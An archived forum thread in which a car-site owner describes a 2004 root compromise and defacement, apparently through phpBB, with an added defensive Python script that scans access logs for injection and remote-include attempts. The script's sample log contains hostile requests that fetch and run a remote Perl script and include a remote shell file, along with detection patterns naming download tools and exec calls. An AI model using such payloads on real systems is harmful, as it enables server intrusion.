View Full Version : Hacked...
axis008
12-07-2004, 05:13 AM
Announcement by Tide (since my thread appeared on the top): Ah, you know you're popular when... So here's the story, yesterday (well it's currently 2:30am here) at about 4pm, I see my wonderful site that you all love and helped create is tarnished by a monkey in a santa suit. Normally I'd be laughing my ass off like any male would, but being the victim here I was not amused. I checked all my websites and they were all defaced. Immediately we shut the machine down to assess the damage. On the surface it looks like a simple script kiddie exploited a hole in PHPBB (on another site I run) and gained root access to the machine. The scripts also deleted the access logs behind them, so I could no longer trust any program on the machine.
The only solution was a complete re-install with all new passwords and updated software. As my luck seems to dictate of late, I was not in town yet again and had a 3 hour drive back to meet my roommate and start this fun process. I do keep off-site backups and that went very well. It's now almost 3am and we're moving the last of the files over.
I do apologize for all the downtime lately. 2 days for 1 bad cpu fan, 1/2 day for my Apache mistake, and now another 1/2 day for scr1pt k1ddi3z.
I don't find it acceptable to have such downtime. Plans were in place to have a complete backup on another machine so a simple DNS switch would bring the site up. We'll be working on this in the next week or so.
Until then, this is the only site I currently am running. I don't know precisely that PHPBB was the culprit, and I want to ensure this does not happen again.
Thanks for your continued patronage,
Tide
Thanks for the update, Chad. I (and everyone else here, I'm sure) am just happy that you are here devoting so much time towards this forum and giving us a place to call home. :)
agctr
12-07-2004, 05:34 AM
Hey Chad,
Know this must have been frustrating to say the least. No need to apologise, these things happen, just glad to see we are back online again. If there is anything I can do to assist in the future, please let me know.
Business as Usual.
Adam.
Legacy05GT
12-07-2004, 05:59 AM
all the VBGarage pics are fucked.
some6uy008
12-07-2004, 06:17 AM
I bet it's one of those damn G35 owners that did it, jealous bastards!
racerdave
12-07-2004, 06:35 AM
Thanks for working to get it back.
I think getting hacked like that makes you more pissed than anything. Hopefully you got the exploit right and have "plugged the dike." :D
*Jedimaster*
12-07-2004, 07:13 AM
I told you this would happen months ago- and it's good you had local backups. You've now been hazed and can go on about your business. Once a site gains a certain level of exposure, it seems someone gets the idea to show their "mad skillz". Good job on the fast restore :)
red beast
12-07-2004, 07:30 AM
teething pains suck.
http://img.villagephotos.com/p/2003-10/423426/christmaschimp.jpg
sduford
12-07-2004, 09:49 AM
Ho Gee, and here I thought Linux and Apache were secure and these kinds of things only happened to Microsoft-based sites!
Sorry, couldn't resist. Sorry for all the trouble Tide and thanks for your great site.
Sly
*Jedimaster*
12-07-2004, 09:52 AM
Ho Gee, and here I thought Linux and Apache were secure and these kinds of things only happened to Microsoft-based sites!
:lol: *eleventy billion!
*Jedimaster*
12-07-2004, 10:04 AM
Here's something fun for you to look into:
http://premium.uploadit.org/cultofthejedi/12345x.JPG
Also, can't attach files- had to link to show the pic.
JessterCPA
12-07-2004, 10:14 AM
Did you also notice the two "stuck" new posts? Regardless of when you log on, the top two are always there.
Drift Monkey
12-07-2004, 10:22 AM
Damn those monkeys!111
Because at 3am I wanted to get the site up first, then noticed I didn't set the system time. It's already been fixed.
Did you also notice the two "stuck" new posts? Regardless of when you log on, the top two are always there.
Just an update, avatars and attachments should all be working fine. Thumbnails in vbGarage however will be offline until I get GD2 installed. No ETA.
EyeFlyIsTheEye
12-07-2004, 02:19 PM
And just where were you when this happened? :lol:
Damn those monkeys!111
Drift Monkey
12-07-2004, 02:39 PM
And just where were you when this happened? :lol:
Receiving multiple IMs asking if I knew what happened to the site, of course. :redface:
I run Legacy Central's BBS on Apache, phpBB2 and Slackware, and it still got hacked, even with the latest version of the BBS software. It was part of a big defacement campaign, and it did very little damage, but it still sucked.
The great thing is that unless it's a big hole, the DB is pretty safe.
Dave
http://legacycentral.org
Thanks for the info, Dave. Unfortunately they removed all my logs too, so I couldn't tell what they exploited to get into the system. For now I'm only running the Legacy site until I get a better idea what the exact exploit was; the PHPBB issue seems most likely in my case, I had it running on 5 other websites, all 2.0.10.
Need4Speed
12-07-2004, 08:23 PM
Is this site hosted at a hosting facility or at a different type of location (business, residence, etc...)?
*Jedimaster*
12-07-2004, 08:48 PM
It's hosted at the Love Shack, bay-bay!
Sorry, had to take the box down for an hour to install new Apache and PHP stuffs.
She runs now!!!
dv8ingvector
12-07-2004, 10:25 PM
thanks for all the hard work
mobilezen
12-07-2004, 10:33 PM
If the guy's or guys' ip address was logged somewhere, please give it to me. :devil:
Wish I could, but I was rooted, they wiped bash history and all apache logs.
dv8ingvector
12-07-2004, 11:19 PM
some beach!
Subietonic
12-07-2004, 11:24 PM
Hunt them down and hang 'em all! I thought you were getting hacked again tonight when I was trying to respond to a post and all of a sudden all I had was html code all over the place. Then the site wouldn't come up at all. Glad to see it was offensive action rather than defensive reaction and that you are back up, operational again. The site is missed when it is off-the-net.
SBT
*Jedimaster*
12-08-2004, 05:27 AM
It's hosted at the Love Shack, bay-bay!
SUBE555
12-08-2004, 10:43 AM
It was indeed missed. Nice to see it back up. Some people really need to get a life and be civil. Kinda like the people that constantly drive in the left lane regardless of everything around them... complete lack of respect for others and their hard work.
John M
12-09-2004, 12:28 PM
Someone just did the same thing to my phpBB 2.0.10 at work. Luckily, the way I had it configured they were just the user "nobody" and couldn't do anything but write files to the /tmp directory. They were trying to set up a file server but the permissions wouldn't allow them to. They couldn't even overwrite HTML files - LOL. I found them when strange things started showing up in the error log. A quick review of the access logs showed how they got in, and all was patched.
My offer from the other thread still stands - if you need anything from temp webspace to secondary DNS, just PM or email me. We've got three T1's and all the disk space you'd need.
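John M's post above describes the trail this kind of break-in leaves when the web server account is properly boxed in: the attacker is stuck as "nobody", can only drop files in /tmp, the error log shows the first oddities, and the access log then shows the request that got them in. As an added example (not code from this thread, from phpBB, or from any poster), here is a small Python scanner that URL-decodes the query string of Apache combined-format access log lines and flags requests that combine several generic command-injection or remote-include indicators (download tools, interpreters, shell chaining, /tmp paths, PHP exec calls, a URL passed as a parameter value). The log lines are constructed for the example, and the indicator list is generic; it is not a signature for the particular phpBB hole the thread never names.

```python
"""Scan Apache combined-format access log lines for generic command-injection
and remote-file-inclusion indicators in the query string.

Added example for this thread. The sample log below is constructed (no real
hosts, no real requests), and the indicators are generic heuristics, not a
signature for any specific phpBB vulnerability.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log: three ordinary requests and two attack attempts.
# Attacker lines use the TEST-NET range 198.51.100.0/24 and a payload host in 203.0.113.0/24.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [07/Dec/2004:15:58:01 -0500] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 18344 "-" "Mozilla/4.0"
192.0.2.11 - - [07/Dec/2004:15:59:13 -0500] "GET /forum/index.php HTTP/1.1" 200 9120 "-" "Mozilla/4.0"
192.0.2.12 - - [07/Dec/2004:16:00:40 -0500] "GET /forum/search.php?q=wget+tutorial HTTP/1.1" 200 4011 "-" "Mozilla/4.0"
198.51.100.7 - - [07/Dec/2004:16:01:07 -0500] "GET /forum/page.php?cmd=cd%2520/tmp;wget%2520http://203.0.113.5/x.pl;perl%2520x.pl HTTP/1.1" 200 18344 "-" "Mozilla/4.0"
198.51.100.7 - - [07/Dec/2004:16:02:30 -0500] "GET /forum/include.php?path=http://203.0.113.5/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# Apache "combined" format: ip ident user [timestamp] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# (name, weight, pattern). A request is flagged when the summed weight of the
# matching indicators reaches the threshold; a lone URL in a parameter value is
# treated as strong enough on its own (classic remote include shape).
INDICATORS = [
    ("download-tool", 1, re.compile(r"\b(wget|curl|lynx|fetch)\b", re.I)),
    ("interpreter", 1, re.compile(r"\b(perl|python|bash)\b", re.I)),
    ("shell-chaining", 1, re.compile(r"[;|`]|\$\(")),
    ("tmp-path", 1, re.compile(r"/tmp\b|/dev/shm", re.I)),
    ("php-exec-call", 1, re.compile(r"\b(system|passthru|shell_exec|exec|eval|popen)\s*\(", re.I)),
    ("remote-url-param", 2, re.compile(r"=\s*(https?|ftp)://", re.I)),
]


def decode_query(query: str) -> str:
    """Percent-decode repeatedly (attackers double-encode) and turn '+' into spaces."""
    prev, cur = None, query
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("+", " ")


def score_query(decoded: str):
    """Return (score, [indicator names]) for one decoded query string."""
    hits = [name for name, _w, rx in INDICATORS if rx.search(decoded)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    return score, hits


def scan_log(text: str, threshold: int = 2):
    """Parse each line, decode its query string and return the flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real scanner would count these
        path, _, query = m.group("target").partition("?")
        if not query:
            continue
        decoded = decode_query(query)
        score, hits = score_query(decoded)
        if score >= threshold:
            findings.append({
                "ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                "path": path, "query": decoded, "score": score, "hits": hits,
            })
    return findings


def top_sources(findings) -> Counter:
    """Count flagged requests per client address, to prioritise the review."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} score={f['score']} {f['hits']}")
        print(f"    query: {f['query']}")
    print("per source:", dict(top_sources(scan_log(SAMPLE_ACCESS_LOG))))
```

The output is a review queue rather than a verdict: the benign search for "wget tutorial" scores one and stays quiet, while a parameter carrying a full URL (`path=http://...`) is flagged on its own because legitimate open redirects and remote includes look identical in the log, and you want a human to look at both. Run it over the real access log before it is rotated or, as in this thread, deleted by the intruder.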
*Jedimaster*
12-09-2004, 12:54 PM
There's no way to stop someone from hacking a website. There's always a way around whatever security countermeasures someone decides to take. It's like the cops vs. radar detectors- always a one up kind of thing. Or like people who steal cars- no matter what you do, there will always be someone who can get the car if they want it enough.
Thanks John, but I already have everything that you're offering. Being the holidays and just getting back into town nothing has been put in place yet, and won't until after Christmas.
rm -rf
12-09-2004, 09:53 PM
Luckily, the way I had it configured they were just the user "nobody" and couldn't do anything but write files to the /tmp directory. They were trying to set up a file server but the permissions wouldn't allow them to.
That is the way to do it. Use the file system permissions.
*Jedimaster*
12-10-2004, 05:51 AM
Um....
WeThree
12-17-2004, 01:55 PM
Probably this 'unserialize' sploit that's been running around...
http://www.hardened-php.net/advisories/012004.txt
No, it wasn't. It was the PHPBB exploit I previously mentioned.